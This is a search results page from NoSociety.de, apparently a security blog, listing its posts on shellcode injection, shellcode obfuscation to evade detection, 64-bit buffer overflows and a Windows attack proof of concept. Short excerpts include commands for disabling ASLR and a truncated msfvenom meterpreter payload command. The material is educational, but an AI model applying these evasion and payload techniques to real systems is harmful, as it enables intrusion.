NoSociety.de


Search

The results of your search are listed below.


Matching page names:

  • Obfuscation: polymorphic in-memory decoder
  • Obfuscation: Disguise shellcode as UUIDs
  • obfuscation_shellcode_als_uuids_tarnen_-_teil_1
  • Shellcode Injection Part 1
  • Shellcode Injection Part 2
  • Shellcode Injection Part 3
  • Shellcode Injection Part 4

Full-text results:

Obfuscation: polymorphic in-memory decoder
103 hits, last modified: 9 months ago
abilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked. We now want to solve t
Shellcode Injection Part 4
70 hits, last modified: 10 months ago
y Windows Kali pentest blog english}} ====== Shellcode Injection Part 4 ====== {{it-security:blog:sc4-h... |}} In this article, we will only deal with shellcode obfuscation in passing. At this point, I wanted to develop a custom shellcode to learn more about how it works. The following ... of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =
Obfuscation: ByteSwapping
61 hits, last modified: 7 months ago
{{tag>IT-Security Windows Kali shellcode blog english}} ====== Obfuscation: ByteSwapping ====== {{it-s... In the last post, I decrypted an encrypted shellcode in the working memory and had it executed. As enc... m into the encryption to make decrypting the shellcode a little more difficult. \\ \\ ===== Preliminary ... %%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== The code ===== ==== Step 1: Python Encoder ==== The corr
Shellcode Injection Part 1
59 hits, last modified: 11 months ago
y windows kali pentest blog english}} ====== Shellcode Injection Part 1 ====== In this series of articles, we look at shellcode, how to inject it into processes and some techniq... In the first part, we look at how to inject shellcode from a local process. In addition, we d... required files in the [[en:it-security:blog:shellcode_injection-1#Repository|repository]] \\ \\ ===== G
Shellcode Injection Part 3
47 hits, last modified: 12 months ago
y Windows Kali pentest blog english}} ====== Shellcode Injection Part 3 ====== {{it-security:blog:shellcode-part-3.png?400|}} Shellcode injections are generally used to initiate a reverse shell. However, in some circumstances it may be necessary to load the code for the shell in the second step. In this blog p
Buffer overflow in the 64-bit stack - part 1
43 hits, last modified: 11 months ago
ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Shellcode Injection Part 2
43 hits, last modified: 11 months ago
y windows kali pentest blog english}} ====== Shellcode Injection Part 2 ====== {{it-security:blog:shellcode-part2.jpg?600|}} In part 1 of the shellcode injection series, we started a reverse shell from a local process. In part 2, we inject the shellcode directly into a process. This form of injection i
Buffer overflow in the 64-bit stack - Part 3
40 hits, last modified: 10 months ago
ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Obfuscation: Disguise shellcode as UUIDs
33 hits, last modified: 10 months ago
blog english}} ====== Obfuscation: Disguise shellcode as UUIDs ====== {{it-security:blog:a3896ce4-2725... 00x200|}} In the last [[en:it-security:blog:shellcode_injection-4|blog post]] we dealt with the development of a calc.exe shellcode. The injection method that I used for testing was... der. I therefore had to adapt the loader and shellcode accordingly. I came up with the idea of converti
Buffer overflow in the 64-bit stack - Part 2
23 hits, last modified: 10 months ago
80568|compiled debug binary]] from the blog. <code bash> br *vuln+73 # set breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
FatCat Attack PoC
14 hits, last modified: 17 months ago
rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete
Privilege escalation: Windows admin thanks to Linux
12 hits, last modified: 10 months ago
ntpw ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find Windows partition ==== We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In our examp
obfuscation_shellcode_als_uuids_tarnen_-_teil_1
1 hit, last modified: 10 months ago
~~REDIRECT>en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen~~